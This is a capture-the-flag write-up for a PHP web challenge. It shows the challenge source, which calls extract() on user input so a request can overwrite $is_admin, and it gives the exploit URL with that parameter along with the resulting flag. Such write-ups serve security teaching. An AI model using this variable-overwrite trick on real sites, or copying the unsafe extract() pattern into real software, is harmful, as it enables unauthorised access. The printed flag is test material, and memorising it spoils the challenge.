Debugger

Challenge Description

let's take a look at the source code of the page

and if we use this seach parameter we can view the source code of the page

php code :

<?php
            define("LOADFLAG", true);
            error_reporting(0);
            function get_debug_info($filters) {
                ob_start(); phpinfo(); $pi = ob_get_contents(); ob_end_clean() ;
                $debug = array();
                foreach(explode(PHP_EOL, $pi) as $line) {
                    if(strstr($line, $filters)) {
                        array_push($debug, $line);
                    }
                }
                return $debug;
            }
            if(isset($_GET['action']) && $_GET['action']=="debug") {
                $is_admin = $_SERVER['REMOTE_ADDR'] == "127.0.0.0" ? 1 : 0;
                $debug_info = get_debug_info(extract($_GET['filters']));
                if($is_admin) {
                    echo implode($debug_info, '\n');
                } else {
                    echo("Only local admins are allowed to debug!");
                }
                include_once "flag.php";
            }
            if(isset($_GET['action']) && $_GET['action']=="src") {
                highlight_file(__FILE__);
            }
            // With <3 from @gehaxelt.
        ?>

this is a PHP script that performs debugging and potentially exposes sensitive information (flag) if certain conditions are met:

1. The URL parameter action is set to "debug" ($_GET['action'] == "debug").

2. The client's IP address ($_SERVER['REMOTE_ADDR']) is "127.0.0.0" (localhost)

so we have to make sure that the conditions are met to solve the challenge and get the flag

send the request to repeater

let's make the first condition true by making the action="debug"

in the php code we had this if the second condition is false this message is shown "Only local admins are allowed to debug!"

if($is_admin) {
   echo implode($debug_info, '\n');
} else {
   echo("Only local admins are allowed to debug!");
}

now we have to make the condition $is_admin true

if(isset($_GET['action']) && $_GET['action']=="debug") {
                $is_admin = $_SERVER['REMOTE_ADDR'] == "127.0.0.0" ? 1 : 0;
                $debug_info = get_debug_info(extract($_GET['filters']));
                if($is_admin) {
                    echo implode($debug_info, '\n');
                } else {
                    echo("Only local admins are allowed to debug!");
                }
                include_once "flag.php";
            }

extract() function is used in a way that could potentially lead to security vulnerabilities, as it extracts variables from an array based on user input. In this case, the code attempts to extract variables from $_GET['filters'], which can allow an attacker to manipulate variables and potentially change the value of $is_admin. Here's how it can be done:

When the URL parameter filters is set to something like &filters[is_admin]=1, it sets the is_admin variable to 1. This happens because extract($_GET['filters']) extracts the value associated with the key 'is_admin' from the $_GET['filters'] array and assigns it to a variable with the same name ($is_admin).

http://52.59.124.14:10018?action=debug&filters[is_admin]=1

Flag

ENO{N3ver_3xtract_ok?}